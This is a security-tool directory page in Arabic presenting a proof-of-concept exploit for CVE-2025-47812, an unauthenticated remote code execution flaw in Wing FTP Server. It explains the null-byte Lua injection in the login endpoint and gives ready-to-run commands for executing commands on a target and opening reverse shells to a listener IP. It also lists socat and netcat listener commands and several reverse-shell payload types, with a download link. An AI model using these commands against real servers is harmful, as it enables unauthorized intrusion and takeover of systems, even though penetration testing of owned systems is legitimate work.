Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-47812-PoC — الاستغلال غير المصادق عليه لتنفيذ تعليمات برمجية عن بُعد لخادم Wing FTP (CVE-2025-47812) مع حمولات متعددة للشل العكسي، وأوضاع تفاعلية ووضع سطر الأوامر، ومعالجة آلية للجلسات. | Kitploit
أدوات/GitHubGitHub/havbay/cve-2025-47812-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعد
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

الاستغلال غير المصادق عليه لتنفيذ تعليمات برمجية عن بُعد لخادم Wing FTP (CVE-2025-47812) مع حمولات متعددة للشل العكسي، وأوضاع تفاعلية ووضع سطر الأوامر، ومعالجة آلية للجلسات.

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-47812 — تنفيذ تعليمات برمجية عن بعد في خادم Wing FTP

Python CVSS Type

نظرة عامة

الحقلالقيمة
CVECVE-2025-47812
المتأثرWing FTP Server < 7.4.4
النوعتنفيذ تعليمات برمجية عن بعد بدون مصادقة
درجة CVSS10.0 (حرج)
تم الإصلاح فيWing FTP Server 7.4.4

كيف يعمل

موجودة الثغرة في نقطة النهاية لتسجيل الدخول /loginok.html. يفشل الخادم في تنقية البايتات الفارغة (%00) في حقل username. يسمح هذا للمهاجم بحقن كود Lua تعسفي في ملفات الجلسة، والتي يتم تقييمها لاحقًا من جانب الخادم عند الوصول إلى نقاط نهاية مثل /dir.html — بدون الحاجة إلى أي مصادقة.

المرجع: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


الميزات

  • تنفيذ أوامر بدون مصادقة
  • حمولات متعددة للصد العكسي (socat, bash, python3, nc-e, nc-fifo, php)
  • حمولة socat مفضلة للحصول على TTY تفاعلي كامل
  • فحص قابلية الوصول للهدف قبل التشغيل
  • استخراج تلقائي لمعرف الجلسة الفريد مع جلسة جديدة لكل محاولة
  • اختيار حمولة محددة باستخدام العلامة --payload
  • حفظ مخرجات الأمر في ملف باستخدام -o
  • قابلية تكوين --timeout و --delay
  • وضع التفصيل/التصحيح باستخدام -v
  • معالجة أنيقة لـ Ctrl+C
  • ملخص الحمولة بعد محاولات الصد العكسي
  • وضع وسائط سطر الأوامر + القائمة التفاعلية
  • مخرجات مرمزة بالألوان

المتطلبات

root@kitploit:~
pip install requests

الاستخدام

الوضع التفاعلي

root@kitploit:~
python3 wingftp_rce_exploit.py

وضع سطر الأوامر

root@kitploit:~
# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

جميع الخيارات

root@kitploit:~
-u / --url        عنوان URL الأساسي للهدف
-U / --username   اسم المستخدم لتسجيل الدخول (الافتراضي: anonymous)
-c / --command    الأمر الذي سيتم تشغيله (وضع الأمر)
-r / --rhost      عنوان IP للمستمع الخاص بك (وضع الصد العكسي)
-p / --rport      منفذ المستمع الخاص بك (وضع الصد العكسي)
     --payload    حمولة محددة لاستخدامها (انظر القائمة أدناه)
     --timeout    مهلة طلب HTTP بالثواني (الافتراضي: 10)
     --delay      التأخير بين محاولات الحمولة بالثواني (الافتراضي: 4)
-o / --output     حفظ مخرجات الأمر في ملف
-v / --verbose    تمكين مخرجات التصحيح

حمولات الصد العكسي


أمثلة

تنفيذ أمر

root@kitploit:~
عنوان URL للهدف : http://192.168.1.10:5466
اسم المستخدم   : anonymous
الاختيار     : 1
الأمر    : whoami

الصد العكسي

الخطوة 1 — ابدأ المستمع الخاص بك (يوصى باستخدام socat للحصول على TTY كامل):

root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

أو باستخدام nc:

root@kitploit:~
nc -lvnp 4444

الخطوة 2 — تشغيل الأداة:

root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

الاعتمادات

  • إثبات المفهوم الأصلي بواسطة blindma1den
  • تم تحسينه وتوسيعه بواسطة Havbuy

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط.
لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها.
الاستخدام غير المصرح به غير قانوني. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.

تنزيل الأداة
الاسمالطريقة
socatPTY كامل عبر socat
bashإعادة توجيه /dev/tcp
python3عملية فرعية للمقبس
nc-eNetcat مع العلم -e
nc-fifoNetcat + mkfifo
phpPHP fsockopen